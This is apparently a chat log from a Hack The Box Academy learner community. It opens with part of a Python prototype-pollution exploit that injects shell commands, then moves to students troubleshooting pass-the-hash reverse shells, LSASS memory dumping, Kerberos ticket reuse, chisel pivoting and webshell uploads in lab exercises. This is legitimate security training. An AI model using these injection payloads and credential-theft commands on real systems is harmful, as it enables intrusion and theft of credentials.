    "password":"test"
}, headers=headers).headers['Set-Cookie']

# prototype pollution 1
requests.post(f"{url}/update", json={
    "constructor":{
        "prototype":{
            "deviceIP":"127.0.0.1; cat /flag.txt"
        }
    }
}, headers=headers)

# get flag
print(requests.get(f"{url}/ping", headers=headers).text)

# prototype pollution 2
requests.post(f"{url}/update", json={
    "constructor":{
        "prototype":{
            "deviceIP":"127.0.0.1; whoami"
        }
    }
}, headers=headers)

# another command
print(requests.get(f"{url}/ping", headers=headers).text) # problem here shows flag again not new result

I have a question. Let's say all the hosts are Windows, attack host, pivot host and internal host. SSH is not enabled on the internal host. Now I want to perform dynamic port forwarding on the pivot host. How can I do that?

why does the second time pollution doesnt work

use other tools, chisel or ligolo

Chisel also works with SSH tunnel under the hood, isn't it?

this is confusing

why is userObject.deviceIP not changed

userObject is an instance of User class

it creates a socks tunnel

if you're using the dynamic tunnel option

oh the first payload is stored in db and recovered so it has high preceedence

how can i avoid this and run multiple payloads

Chisel is a TCP/UDP-based tunneling tool written in Go that uses HTTP to transport data that is secured using SSH

This is the first sentence in the module section

i think chisel uses multiple ssh connections nvm

i think its multiple ssh channels

so its faster than normal ssh -D or idk why its faster

So if SSH has been disabled, then chisel won't work. Isn't that correct?

ssh is just a protocol

for encryption stuff

May be its a typo? I mean we use SSL for encrytion. Do we also use SSH for encryption?

ssl and ssh are two different things

Exactly

Is SSH also used for encryption?

chisel uses the ssh protocol to transport data, it comes bundled to the binary, it doesn't need it to be installed on the host

Okay. So that means even if the internal host doesn't have SSH server running, we can perform dynamic port forwarding with chisel?

yes, which is what I said to begin with

😂

Okay thanks

The first sentence in the section had SSH, which got me confused🤷‍♀️

it does but ssh doesn't need to be installed

Thanks for this.

I use a word processing app for notes in the modules and then use MindNode, a mind-mapping application, for the cheat sheets and the exercises. When I'm doing the exercises, I copy and paste all of the commands I executed that led to the answer and their output and add this into the mindmap. This way I can search through all that I've done and search the cheat sheets too

https://academy.hackthebox.com/module/144/section/1256 In web gathering, I am trying to find the FQDN of an IP... Here I added the DNS name and IP in my /etc/hosts file, but cant seem to resolve it with nslookup... (I am trying nslookup -type=NS inlanefreight.htb)... Any help pls or suggestions?

host is up btw. ping works

FIXED it... specified IP, thanks...

anyone have done sliver module here

I have

i am not able to get shell in probing the surface section

i followed the exact same commands

Works on my machine, check that you have correct IPs and check that byte code is actually made to your IP. Also check that you have correct port and address in listener

Summarizing each section in your own words is really great. I take hand-written notes through each section and summarize similarly where needed. Even if I rarely reference those hand-written notes it's the act of writing that helps me retain things.

My more elaborate solution is a personal wiki I run locally. A section for services / services by port number and a section for tools where I note odd-ball flags and copy-paste-mangle examples I can grab quickly. I wouldn't advocate for such a solution -- do what works best for you -- but be mindful about locking your data into proprietary formats / cloud-systems that are either prone to corruption or would be very difficult to migrate away from (e.g. I'm looking at Cherry Tree). My wiki is based on collections of ASCII files, so worst-case I can always get at the contents if something broke in the software.

for Exploiting Web Vulnerabilities in Thick-Client Applications
anyone knows where is fatty-client.jar located at ?

only saw these 3 notes.txt

@next bronze

look who works

Why can't I write to general?

read and follow #welcome

👍

Hi everyone, I'll be frank and direct, I'm in the password attack section, in the form:
PASS THE HASH, I have to answer the last question, which asks me this:
Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.

I used these commands in sequence

1└─$ evil-winrm -i 10.129.204.23 -u julio -H 64f12cddaa88057e06a81b54e73b949b
C:\Users\Administrator\Documents> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

2- └─$ evil-winrm -i 10.129.204.23 -u julio -H 64f12cddaa88057e06a81b54e73b949b
C:\Users\Administrator\Documents> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

than
└─$ xfreerdp /v:10.129.204.23 /u:Administrator /pth:30B3783CE2ABF1AF70F77D0660CF3453

open cmd as admin
nc.exe -lvnp 8007

open powershel as admin, in sequence

Import-Module .\Invoke-TheHash.psd1

Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e -base 64 payload- "

this is the result:

Can someone tell me what went wrong?

you took the ip from your host machine?

or the ip from this compromised machine?
" (the target machine, DC01, can only connect to MS01)"

i am in ms01 pc

well yea but your payload?

which IP did it contain?

172.16.1.5

but in the module it said that you could put DC01 as target, is that wrong?

I'm not understanding if I should use it as a target
172.16.1.5
172.16.1.10
or DC01

U try dc01 as target

I rmb using Dc01 as my target

in the screen I sent I wrote DC01 in the script, but it doesn't respond

you can use dc01 as the target

what is the IP you're using in your revshell payload though, was the question

172.16.1.10 or dc01, either one works

but you aint getting a connection back

meaning you either listening to wrong port or wrong IP

what he suggested to me, I put this in the payload:
172.16.1.5

Try changing the domain to inlanefreight too instead of inlanefreight.htb

Nt sure if it works but thats what i did back then

Should I put the one ending with .10 in the payload?

what does ipconfig /all tell you the IP is

in the payload

for your compromised host

ends with .5

like the one I used in the payload

ok and does your payload use the right port?

also i think this module uses .local not .htb

switch inlanefreight.htb --> inlanefreight.local

checked mine and i used htb aswell, and it worked

really?

huh

damm a real windows machine user

so I transform this: Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb
in Invoke-WMIExec -Target DC01 -Domain inlanefreight.local, right?

been a minute then

yea worked for me

it could also be a case of for whatever reason the internal network isn't working properly

a very good advice
use linux machine for hacking

and the resolution would be to change vpn regions

or something magicly added when pasting your payload

this doesn't matter for this instance dude

this is attacking from a domain joined windows host

yes but is good advice

depends really. You'll get kicked out if sysadmin sees a kali machine on network

(red team assesment)

unless you ask very nicely

xD

If its pentest its ok'

nah i know someone that had to beg their SOC guys to let him have kali to do internal pentests

Tf 💀

iirc someone else had the exe whitelisted but not one of the subprocesses for virtualbox, so it couldn't network

Oh I see

I'm not understanding...

🥲

what should I do=

did you remade the payload?

Anyone knows where the fatty-client.jar is located?😬

should I change the ip address to .10?

I mean, could you tell me how to change it? Could you be a little more clear?

your revshell should use the 172.16.1.5

no, 10 is not correct
172.16.1.5 is correct

https://www.revshells.com/
ip and port set

make sure they are correct and your listener is listening to correc port aswell.

when just clicking and selecting the right payload, i get the same revshell b64 encode that @fringe urchin got

starts with the same characters anyway

ah i see your issue

you turned on advanced options; and thus further changed the payload

you added an extra layer of b64

you changed these options

that's why it's not working

also the -Target isn't 172.16.1.5-Domain

it's the DC01/172.16.1.10

marcie so if I understand correctly I have to turn econding in none , right?

yes you leave it at default

^

you can aswell see the payload on the right is yours and it stats with "CG...." and on the guide it starts with "JAB"
and if you check mine, it starts with "JAB" too

the payload you generated was a b64 payload OF the powershell payload

meaning it would need to first decode then decode again

ok guys, thank you because I solved it. I love this environment, you are always so helpful. Thanks again guys, you are magical

i mean the module doesn't show that option selected, so you shouldn't select it

in reality the form doesn't show that part at all, so by pressing the link, I didn't pay much attention to the fact that it was set since it doesn't mention it

Working on Command Injections -> Identifying Filters. I've gone through all the discussed characters to test. I've found, what I believe, is the character that isn't filtered out, however when I try to answer the question, it tells me that it's incorrect. Am I misunderstanding something?

if it doesn't look similar to the example, you're doing something wrong

the example shows it start with powershell -e (this tells powershell you're passing it encoded text btw)

in fact, I follow your advice that you gave me some time ago: if the path you're taking isn't right, change it, only when I really have no other alternatives I have to ask for a suggestion

Hi, can you guys please help me? I just can't create an lsass.dmp file. I am running this command in PowerShell, but whenever I search the folder that is supposed to contain the lsass.dmp file, it is empty:

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\users\htb-student\documents\lsass.dmp full

I am in the module password attacks Attacking LSASS

is that both one command? isnt "C:\windows\system32\comsvcs.dll" victim machine and "C:\users\htb-student\documents\lsass.dmp" your attacking machine? im pretty sure thats not how the command works,
you put file path and then file destination, cant be your local machine, you will need to manually transfter it over

no this looks right(ish)

but you do need to be sure the PID is correct

but isnt his second path his local machine?

no?

the path is on the target machine

ah then my bad, i got confused since i saw "htb-student" and though he is on his local machine

htb-student is the username

with pwnbox your username is like htb-ac{numbers}

The original command is: PS C:\Windows\system32> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full

But I just can't create the dump file there either.

try running it from CMD instead of powershell

also is the PID correct

is that the PID of the lsass process

right. sorry for that

It is not working either. I thought it was because of the AV on the target machine, but there is no AV.

nice you fixed it, what'd you do?

nothing. came home from work, booted up, tried it once more and it worked

....

https://tenor.com/view/it-be-like-that-sometimes-like-that-sometimes-snoop-dogg-sometimes-just-like-it-gif-12501830

now im stuck on last question

Sorry for that, i am trying every possible thing that comes to my mind lol

i didnt went with powershell path, i just went to task manager and dumped it

bad

use my tool

i was doing that on a macbook + htbs box. i really hated that time

rdp is stinky, do everything in the command line

yea rdp sucks, but the main problem was i had to use my dads macbook, 13 zoll screen.... till my computer arrived.

Task manager. Can you tell me how you get the dump file that way?

whats the error this gave you

if you can dump with via taskmanager you can dump it in the command line

Omg thanks a lot

but like xreous said, if you can do it with task manager, it works with cmd/powershell too

just gotta have the right process ID

@trail sail your issue is that you just copy/pasted the command from the section, the PID from the example and the PID from the lab won't generally match unless by cosmic coincidence

module: Password attack
section:Pass the Ticket (PtT) from Linux
Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).

well i found the ticket for linux01 but i cant seem to connect to it?
i tried importin it and then using with vmiexe like show above, i tried uploading it on the windows machine (Ju***) and importing the ticket via rubeus.exe (i converted it before to kirbi) but that didnt work either.
any nudge on what im doing wrong?

the PS C:\Windows\System32\ > is your cwd in powershell in the example command; everything after is the actual command to run

you shouldn't need to do anything to it if you found it in the appropriate place, make sure it's not expired

the AD Enum labs has been spawning weirdly on US servers

also it's asking you to just access the share no?

why are you trying to use wmixec instead of just smbclient?

i swear ive been trying to connect to it for an hour or two
im EU so i should be fine

i found the file in: /v**/l**/s**/d*/

ehm well if i already used wmixec for julio share, then linux01 share shouldnt be mich diff

also you don't need to do anything from a windows machine for this section

the error is the machine account doesn't have RPC access

so why not just try accessing it via the intended smbclient method

ok give me a minute

machine ran out of time

I hate to say it but

isn't this the one that also has a silly unintended?

error "REQUIRED_FIELDS"

I honestly don't remember

it's been a while

what academy module does this relate to?

i was looking if i cn upload pics

if it's unrelated to an academy module; wrong channel

try looking in #web

SECURITY MONITORING & SIEM FUNDAMENTALS
Page 7
SIEM Visualization Example 2: Failed Logon Attempts (Disabled Users)
. For question 2 I assumed it is admin* after user.name:. since that what it shows in one of the working queries and it does perform the outcame explained. If someonce can help stir me in the right direction it would be much appriciated. Thanks 🙂

think about more than just admin-stuff where else can the stuff be?

your filter catches admin-lol but what if it's sqladmin?

Has anyone finished the "Introduction to Windows Evasion Techniques" module? specifically SA2. I have two different techniques that work fine when I run them manually on the provided user, but they don't run on the automated user. Wondering if its skill issue (as always right?) or else. Would love to chat about it

Just completed the hard firewall/IDS/IPS lab, only took a few hours of smashing my head off the wall now I feel like an idiot

just read (but it's genuinely funny)

proxychains4 smbclient -k //dc01/linux01
would that in a normal case suffice? cuz it doesnt for me

try adding -N

i didn't pivot for this, i just used the provided Linux host

from the svc_ user?

from root

well yea , svc_ > root

Hlo guys

im going insane

How to give write permission/usr/share/wordlits

did you import the KRB5CCNAME after switching to root

yea

weird

i mean you really don't need write permission, just read permission

[---][---][---]
r = 4
w = 2
x = 1
you'd want the general perms to be 644

r/w owner, r group, r others

rw-r--r--

Tnx🥰

(also /usr/share/wordlists/)

you typod wordlits

which doesn't exist

Yaah right

This file and directory not showing

thank you very much! *

Wordlist-probable.txt

How can fix

Add more passwords

got it!..... not sure till now why i couldnt just pivot tho?

ty

I wouldn't suggest editing pre-made password lists

Does anyone have or have edited/crafted a better cheat sheet for the Linux priv esc module? The one they provide is a bit messy and I'm wondering if someone has done the hard work for me to make it nicer haha

If you need to edit it, just use a different list

Okkk.

Don't dm without asking

Im a bit confused on the "Using Splunk Applications" section, am I supposed to install the Sysmon app onto my version of splunk or onto the version pwnbox provides me?

As in, do i have to download the sysmon app within the VM and add it into the Splunk from the "targeted IP"

The target ip should have splunk running iirc

And sysmon

I looked for that in the apps and sysmon isnt there. Imma going to try to download it from the VM

You can't

At least on the target*

Targets don't have internet access

But I'm sure the section details steps

The footprinting module is kicking my but.

So i read online and other people had the same issue of not having access to the sysmon app during that section, but there is a way to get an answer for the question without having to access it.

Kinda of a curve-ball section tbh

@wide river i sent you a dm if you dont mind.

for aen, is the "vhosts needed" section a spoiler or are they required to know beforehand

Yes

Anything regarding the questions or reading is a spoiler

The whole module uses the same lab

So you shouldn't need to look beyond p1

Has anyone else had some issues with targets not spawning lately? Yesterday I had a lot of trouble spawning in the AD Trust attacks module. Now im experiencing the same thing. Just seems to hang and refreshing the page gives me the option to spawn again....

been an ongoing issue for a while. try changing regions (ie. US -> EU, or EU -> US)

Thank you for the sanity check.

I will type it from now on, following the example. Thanks, Schainy! It is true, this is not the first time I have had that issue with a command from the section by being lazy and doing a copy-paste.

I am having an issue in the AEN module Exploitation & PE section ... in the DNN dash I have added asp,aspx but when I go to upload the webshell it say file extension not allowed ... any idea what the issue is and how to resolve this?

Maybe the folder does not have the right permissions. Although the list you are showing allows the extension, the folder does not.

you could be right ... let me poke around

Quick question. How do we get the octet values for octect 2/3/4 when the bit values are set to 0 and not 1? 1st Octet - Value: 192
IP Addresses
Values: 128 64 32 16 8 4 2 1
Binary: 1 1 0 0 0 0 0 0
If we calculate the sum of all these values for each octet where the bit is set to 1, we get the sum:

Octet Values Sum
1st 128 + 64 + 0 + 0 + 0 + 0 + 0 + 0 = 192
2nd 128 + 0 + 32 + 0 + 8 + 0 + 0 + 0 = 168
3rd 0 + 0 + 0 + 0 + 8 + 0 + 2 + 0 = 10
4th 0 + 0 + 32 + 0 + 0 + 4 + 2 + 1 = 39

What is your overarching question, subnet masks?